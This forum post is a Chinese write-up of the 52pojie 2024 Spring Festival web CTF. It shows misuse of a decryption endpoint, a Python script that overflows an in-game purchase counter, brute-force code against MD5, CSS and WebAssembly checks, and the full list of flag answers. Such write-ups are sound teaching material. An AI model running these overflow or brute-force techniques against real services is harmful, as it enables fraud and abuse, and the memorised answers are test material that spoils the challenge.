【2024春节】解题领红包题解 8~10-Web
题解
https://www.bilibili.com/video/BV1ap421R7VS/
从视频中得出几个易知网址
QR码
https://2024challenge.52pojie.cn/
项目地址
https://github.com/ganlvtech/52pojie-2024-challenge
flagA
https://2024challenge.52pojie.cn/index.html
https://2024challenge.52pojie.cn/auth/login
HTTP/1.1 302 Found
Date: Wed, 21 Feb 2024 18:44:54 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: wzws_sessionid=gDI3LjE1NC4yMDMuOTeCZjkyZGJjoGXWRKaBYzEzNjll; Path=/; HttpOnly
Location: /
Set-Cookie: uid=2KFwj6jFf44dKlXDB+Ti88nMbWFkPXRXHFga9LtUy7ChNg==; path=/; SameSite=Lax
Set-Cookie: flagA=L6Sv7Og44YdiI+gNpgm9YF5sWDCoAa4OYlnM9AKsTQHrjEZ54tPcYWx12Q==; expires=Wed, 21 Feb 2024 18:50:00 GMT; path=/; SameSite=Lax
WZWS-RAY: 1139-1708569894.388-s4jhg
HTTP/1.1 302 Found
Date: Wed, 21 Feb 2024 19:14:08 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: wzws_sessionid=gDI3LjE1NC4yMDMuOTegZdZLgIFjMTM2OWWCZjkyZGJj; Path=/; HttpOnly
Location: /
Set-Cookie: uid=UUt56zJRESolKTW0ORX2PqGHYM3KB/J7eherP4nANd0yvA==; path=/; SameSite=Lax
Set-Cookie: flagA=RB7TyehutV08nZaXMaQADZx8WIwXjwmJkQtHqVnFjIKBNNSwGgAx7idYJg==; expires=Wed, 21 Feb 2024 19:20:00 GMT; path=/; SameSite=Lax
WZWS-RAY: 1139-1708571648.108-s5jhg
这个加密是动态的,盲猜RSA,暴力肯定是不行的,猜测https://2024challenge.52pojie.cn/auth/uid接口的uid解密关系
发现只和cookie中的uid有关,遂将uid内容替换为flagA(脑洞不是一般的大)
flagA{e3cadceb}
此处https://2024challenge.52pojie.cn/auth/uid接口相当于本次2024challenge的解密接口,能看到所有cookie缓存加密的数据,比如game2048_user_data
game2048_user_data
NtDDJugdK6TKcTmcBCnYLkelVZWMLEArgd8fsJELNZWRwJERBE9rcy9IpXysY8b4qUgdo4reIaMkT0hlKjw3/gXty+q1qx1PjxR8z3KEqsVwF2YBk8tEPnsEAsABb0sj7DforzjCJ7oAjHq4il1IZ76FFBz5jNVTT4legOKoM64=;
{"game_data":{"tiles":[2,4,2,4,4,256,32,2,8,32,2,512,16,128,4,128],"score":7572},"money_count":8194}
3+WawrjedRnS42J4x3aEDQ/whnHbIHSGbWhq3C/Vg2HBwlqCAvxreT5n2LM96ZVVQ/UCPO2QaF9TKMQiRxD5AKcaJiiuf304Fxzs3oJR03z76AYYC6xcTEZMBeBxn4t8dikJkRW+zFg=
{"game_data":{"tiles":[0,0,0,0,0,0,2,0,0,0,0,0,0,2,0,0]},"money_count":7994}
Jz0gXDjJG+a1gpE1Z70m7PibK246/vtXKKMPXOfAUaHp02uCZdhwKShsHKoVVDnOO3lpN4B5qFEYmU2xRbrM1Ct1j4Tr6MoQEXyl+JloyuTHimkF/g==
{"game_data":{"tiles":[0,0,0,0,0,0,0,0,2,0,0,0,0,2,0,0]}}
Oqgi98bM7Ce0E2e4n74FX9jStsvbVMkss76cfWx3ge6n5VKg7ajCMZqgp/5MWvtB8bJ/TrJkMl/R5Yg2tdRZ9YF79hRTrMSRy312GLKwgHYMKvrPj94ERE6P7Zvcw+HoROtYvlv1b2VG4xU304p6LHsuYeyc8PLO39V4dN4pZfctGsyT5bOn5Sf7Hw==
{"game_data":{"tiles":[0,0,0,2,0,0,0,0,0,0,2,4,0,4,8,64],"score":332},"money_count":282,"double_money_count":1}
flagB
https://2024challenge.52pojie.cn/flagB/index.html
根据flagB.js页面代码知,通过访问后台接口游玩2048,获得积分
//开局
const get_info = () => request('/flagB/info');
//重试
const restart = () => request('/flagB/restart', {method: 'POST'});
//运动 MOVE_UP-1 MOVE_DOWN-2 MOVE_LEFT-3 MOVE_RIGHT-4
const move = (direction) => request('/flagB/move', {method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: `direction=${encodeURIComponent(direction)}`});
//获取商店信息
const get_shop = () => request('/flagB/shop');
//购买商品
const buy_item = (shop_item_id, buy_count) => request('/flagB/buy_item', {method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: `shop_item_id=${encodeURIComponent(shop_item_id)}&buy_count=${encodeURIComponent(buy_count)}`});
//使用物品
const use_item = (item_id) => request('/flagB/use_item', {method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: `item_id=${encodeURIComponent(item_id)}`});
思路不明确,查看网络访问,发现set_cookie,game2048_user_data一直在变,重发旧ck,发现数据直接是存储在game2048_user_data里的,逆加密秘钥?不现实(后来解flag2的时候发现是RSA逆个锤子,哈哈哈哈哈)
当数量填写50000000000购买flagB触发溢出,祭出py测试金币上限
2^63-1 = 9223372036854775807
Long型的最大值
//购买商品之后钱怎么还变多了?不知道出什么 bug 了,暂时先拦一下 ^_^
//钱不够
import requests
import numpy as np
ck = "wzws_sessionid=gmY5MmRiY6Bl1qBhgDI3LjE1NC4yMDIuMTgzgTlmZWE3MA==; uid=RReWEcPoCdv7reT42vzFbfliVdI8x0c61RdIQCsx24eidQ==; game2048_user_data=MhXwAjipQS7eWkuF0RYS6I0IoebonNW8B4Is04IblIoO0gCC3PljSd4LhpWaur8tAwJQAJwi3lKO0N3bnmg6O22er6kyQHjUH2HYBYMkKW1TW+rVavpD9vEvtRKXQliB+VKzpmlm95eRf7pgLkututvICfgH+ozWBpbRP9noYGmkrVbA4foeUogAAJAp9TH8IQ=="
session = requests.session()
headers = {
"Host": "2024challenge.52pojie.cn",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0",
"Accept": "*/*",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate, br",
"Referer": "https://2024challenge.52pojie.cn/flagB/index.html",
"Content-Type": "application/x-www-form-urlencoded",
"Origin": "https://2024challenge.52pojie.cn",
"Connection": "keep-alive",
"Cookie": ck,
"Sec-Fetch-Dest": "empty",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-Site": "same-origin",
"Pragma": "no-cache",
"Cache-Control": "no-cache"
}
def get_headers(_ck):
# 复制一份headers,修改ck
_headers = headers.copy()
_headers["Cookie"] = _headers["Cookie"]+_ck+";"
return _headers
def buy_item(shop_item_id, buy_count):
_data = {}
try:
url = "https://2024challenge.52pojie.cn/flagB/buy_item"
data = {
"shop_item_id": shop_item_id,
"buy_count": buy_count
}
response = session.post(url, headers=get_headers(ck), data=data)
_data = response.json()
if _data["code"] == 0:
print("购买成功", shop_item_id, buy_count)
return _data
# if "msg" in _data:
# print(_data["msg"])
# toView(_data)
return _data
except Exception as e:
print(_data)
return None
# buy_item("5", num)["code"] = 0时,表示购买成功,否则购买失败
# 有两种提示
# 钱不够 表示金币不够
# 购买商品之后钱怎么还变多了?不知道出什么 bug 了,暂时先拦一下 ^_^ 表示触发溢出
# 需要找到一个在溢出和钱不够之间的值,能购买成功
# 既然是溢出,那就直接上2^n
for i in range(10, 65):
rs = buy_item("5", str(2**i))
if rs["code"] == 0:
print("购买成功, [ 2^", i, "] ", str(2**i))
# 购买成功, [ 2^ 62 ] 4611686018427387904
flagB{f382d735}
flagC
https://2024challenge.52pojie.cn/flagC/index.html
构造图片给猜,flag肯定在/flagC/verify接口里
document.querySelector('#result').textContent = hint; // 错误时显示提示,正确时显示 flag
暴力?你怎么天天暴力!!!哈哈哈哈哈
flag1
flag1{52pj2024}
flag2
藏得真深啊
flag2{xHOpRP}
flag3
雪花屏人工识别
flag3{GRsgk2}
flag4 & 5 & 9 & 10
https://2024challenge.52pojie.cn/flag4_flag10.png
flag4{YvJZNS}
flag5{P3prqF}
flag9{KHTALK}
这玩意没看到flag10,但文件名包含,盲猜隐写了,上工具 Stegsolve.jar
java -jar ./Stegsolve.jar
flag10{6BxMkW}
flag6
https://2024challenge.52pojie.cn/flag6/index.html
document.querySelector('button').addEventListener('click', () => {
const t0 = Date.now();
for (let i = 0; i < 1e8; i++) {
if ((i & 0x1ffff) === 0x1ffff) {
const progress = i / 1e8;
const t = Date.now() - t0;
console.log(`${(progress * 100).toFixed(2)}% ${Math.floor(t / 1000)}s ETA:${Math.floor(t / progress / 1000)}s`);
}
if (MD5(String(i)) === '1c450bbafad15ad87c32831fa1a616fc') {
document.querySelector('#result').textContent = `flag6{${i}}`;
break;
}
}
});
//flag6{20240217}
flag7
https://github.com/ganlvtech/52pojie-2024-challenge
commit中包含删除不小心提交的flag内容
还有一个新的视频吾爱破解2024年春节解题红包视频.mp4
flag8
flagB购买道具显示
flag8{OaOjIK}
flag11
https://2024challenge.52pojie.cn/flag11/index.html
拼图游戏
<html>
<head>
<style>
:root {
--var1: 0; /* 在 0 ~ 100 范围内找到一个合适的值 */
--var2: 0; /* 在 0 ~ 100 范围内找到一个合适的值 */
}
#a000 {
position: absolute;
left: 0;
top: 0;
width: 30px;
height: 30px;
background: url(flag11.png) 0px 0px;
transform: translate(calc(942.5135817416999px + 1.0215884355337748px * var(--var1) + 0.24768196677010001px * var(--var2)), calc(224.16483995058888px + 2.9293942195858147px * var(--var1) + 0.8924085229409133px * var(--var2)));
}
</style>
</head>
<body>
<div>
<div id="a000"></div>
<div id="a319"></div>
</div>
</body>
</html>
才100*100,直接暴力解
const root = document.documentElement;
let i = 0;
let j = 0;
function updateValues() {
root.style.setProperty('--var1', i);
root.style.setProperty('--var2', j);
console.log("i: " + i + ", j: " + j);
j++; // 更新j的值
if (j === 100) {
j = 0;
i++; // 更新i的值
}
if (i === 100) {
clearInterval(interval); // 当i达到100时停止定时器
}
}
let interval = setInterval(updateValues, 50);
//答案
let i = 71;
let j = 20;
document.documentElement.style.setProperty('--var1', i);
document.documentElement.style.setProperty('--var2', j);
flag12
https://2024challenge.52pojie.cn/flag12/index.html
https://2024challenge.52pojie.cn/flag12/flag12.wasm
暴力?
//密码范围: 0 ~ 4294967295
const get_flag = (secret) => {
let num = instance.exports.get_flag12(secret);
let str = '';
while (num > 0) {
str = String.fromCodePoint(num & 0xff) + str;
num >>= 8;
}
//console.log(str)
if(str.length>0) throw Error(str)
//return `flag12{${str}}`;
}
for(i=0;i<=4294967295;i++){
get_flag(i)
}
<meta charset="UTF-8">
<div>输入密码获取 flag12 (密码范围: 0 ~ 4294967295): <input type="text"><button>获取 flag12</button></div>
<div id="result"></div>
<script>
WebAssembly.instantiateStreaming(fetch('flag12.wasm'))
.then(({instance}) => {
const get_flag = (secret) => {
let num = instance.exports.get_flag12(secret);
let str = '';
while (num > 0) {
str = String.fromCodePoint(num & 0xff) + str;
num >>= 8;
}
//console.log(str)
if(str.length>0) throw Error(str)
//return `flag12{${str}}`;
}
document.querySelector('button').addEventListener('click', (e) => {
for(i=0;i<=4294967295;i++){
get_flag(i)
}
e.preventDefault();
document.querySelector('#result').textContent = get_flag12(parseInt(document.querySelector('input').value));
});
});
</script>
//index.html:15 Uncaught Error: HOXI
汇总
flagA{e3cadceb}
flagB{f382d735}
flagC{d466f41e}
flag1{52pj2024}
flag2{xHOpRP}
flag3{GRsgk2}
flag4{YvJZNS}
flag5{P3prqF}
flag6{20240217}
flag7{Djl9NQ}
flag8{OaOjIK}
flag9{KHTALK}
flag10{6BxMkW}
flag11{HPQfVF}
flag12{HOXI}
# flagABC有时效,需即用即取
flag1{52pj2024} flag2{xHOpRP} flag3{GRsgk2} flag4{YvJZNS} flag5{P3prqF} flagA{e3cadceb}
flag5{P3prqF} flag6{20240217} flag7{Djl9NQ} flag8{OaOjIK} flagB{f382d735}
flag9{KHTALK} flag10{6BxMkW} flag11{HPQfVF} flag12{HOXI} flagC{d466f41e}
8~10-Web 初级题 题解.zip
(380.73 KB, 下载次数: 3)
发表于 2024-2-25 17:42
|
发表于 2024-2-26 14:46
